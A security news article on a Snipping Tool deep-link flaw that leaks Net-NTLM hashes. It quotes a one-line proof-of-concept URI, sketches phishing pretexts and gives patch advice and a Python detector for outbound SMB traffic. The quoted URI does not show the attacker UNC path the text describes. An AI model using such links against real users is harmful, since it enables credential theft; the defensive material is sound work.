CyberSecurityNews

PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability


A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft’s Snipping Tool that allows attackers to silently steal users’ Net-NTLM credential hashes by luring them to a malicious webpage.

Tracked as CVE-2026-33829, the flaw lies in how Windows Snipping Tool handles the deep link it registers for the ms-screensketch: URI scheme. Affected versions accept a filePath parameter on that link.

Because the parameter is not validated, an attacker can set it to a UNC path that points at a remote, attacker-controlled SMB server. Snipping Tool then tries to open the path, Windows makes an authenticated SMB connection to that server, and the attacker captures the victim's Net-NTLM challenge-response hash in the process.

The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.

Windows Snipping Tool PoC

Exploitation requires little technical sophistication. An attacker needs only to host the malicious URL, or an HTML page that triggers the deep link automatically, and convince the target to visit it. The PoC from Black Arrow Security demonstrates the attack with a single browser-triggered URI, in which the filePath value is a UNC path to the attacker's SMB server:

ms-screensketch:edit?&filePath=\file.png&isTemporary=false&saved=true&source=Toast

When a victim opens this link, Snipping Tool launches and silently tries to load the file over SMB. Windows authenticates to the attacker's server automatically during that connection, sending the user's Net-NTLM response (Net-NTLMv2 on default configurations). That value is not the account's password hash and cannot be used for pass-the-hash, but it can be cracked offline to recover the password or relayed in real time to internal services that still accept NTLM authentication.


What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document.

An attacker could register a domain like snip.example.com and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes.

The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication occurs transparently in the background.

This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.

Patch Availability and Timeline

Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows:

  • March 23, 2026 — Vulnerability reported to Microsoft.
  • April 14, 2026 — Microsoft releases a security patch.
  • April 14, 2026 — Coordinated public advisory and PoC release.

Organizations and individual users running affected versions of the Windows Snipping Tool should apply the April 14, 2026, security update immediately. Snipping Tool is distributed as a Store app (package Microsoft.ScreenSketch), so confirm that Microsoft Store app updates are not blocked on managed devices and that the installed version is the patched one.

Security teams should also monitor for unexpected outbound SMB connections (TCP 445) from workstations to external or unknown hosts, which could indicate exploitation attempts. Blocking outbound SMB at the network perimeter remains a strong defensive measure regardless of patch status, with one caveat: if the WebClient service is running, Windows can fall back to WebDAV over HTTP/HTTPS when SMB is unreachable, so the UNC request can still leave the network on ports 80 and 443 and still carry NTLM authentication. Disabling the WebClient service where it is not needed, and restricting outgoing NTLM through the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy, closes that path as well.
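The monitoring step above, as an added example that is not part of the original article: a small Python detector run over a constructed key=value connection log (the field names and the sample records are invented for this example, not real Sysmon or firewall output). It flags any connection to TCP 445 or 139 whose destination lies outside an explicitly listed internal address space, and reports the process that made it.

```python
import ipaddress
import re
from typing import Optional

# SMB listens on 445 (direct) and 139 (NetBIOS session); both carry NTLM authentication.
SMB_PORTS = {445, 139}
# The organisation's own address space; anything outside it is "external".
# Listed explicitly rather than using ip_address().is_global, because the RFC 5737
# documentation ranges in the sample data are not treated as global by Python.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
)]

_KV = re.compile(r"(\w+)=(\S+)")

# Constructed sample log (assumed format: timestamp, then key=value fields).
SAMPLE_LOG = """\
2026-04-15T10:22:01Z host=WS-0412 image=SnippingTool.exe src=10.0.5.21:51234 dst=203.0.113.10:445 proto=tcp
2026-04-15T10:22:05Z host=WS-0412 image=explorer.exe src=10.0.5.21:51240 dst=10.0.1.5:445 proto=tcp
2026-04-15T10:23:11Z host=WS-0419 image=msedge.exe src=10.0.5.33:49822 dst=203.0.113.80:443 proto=tcp
2026-04-15T10:24:02Z host=WS-0412 image=svchost.exe src=10.0.5.21:51301 dst=198.51.100.7:139 proto=tcp
garbage line without fields
"""


def parse_line(line: str) -> Optional[dict]:
    """Parse one record; returns None for malformed lines instead of raising."""
    fields = dict(_KV.findall(line))
    if "dst" not in fields:
        return None
    ip, _, port = fields["dst"].rpartition(":")
    try:
        fields["dst_ip"] = ipaddress.ip_address(ip.strip("[]"))  # [v6]:port form too
        fields["dst_port"] = int(port)
    except ValueError:
        return None
    fields["ts"] = line.split(" ", 1)[0]
    return fields


def is_internal(ip) -> bool:
    """True if the address (string or ipaddress object) falls in INTERNAL_NETS."""
    addr = ipaddress.ip_address(str(ip))
    return any(addr in net for net in INTERNAL_NETS)


def find_external_smb(log_text: str) -> list:
    """Return one alert per outbound SMB connection to a non-internal host."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["dst_port"] in SMB_PORTS and not is_internal(rec["dst_ip"]):
            alerts.append({
                "ts": rec["ts"],
                "host": rec.get("host"),
                "image": rec.get("image"),
                "dst": f'{rec["dst_ip"]}:{rec["dst_port"]}',
            })
    return alerts


if __name__ == "__main__":
    for alert in find_external_smb(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["host"]} {alert["image"]} -> {alert["dst"]}')
```

In production, replace INTERNAL_NETS with your own prefixes and feed the detector the connection events your EDR or firewall already emits. A WebDAV fallback would show up as port 80/443 traffic from the svchost.exe instance hosting the WebClient service, which this port-based rule does not catch; pair it with the perimeter block and the NTLM restriction policy described above.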
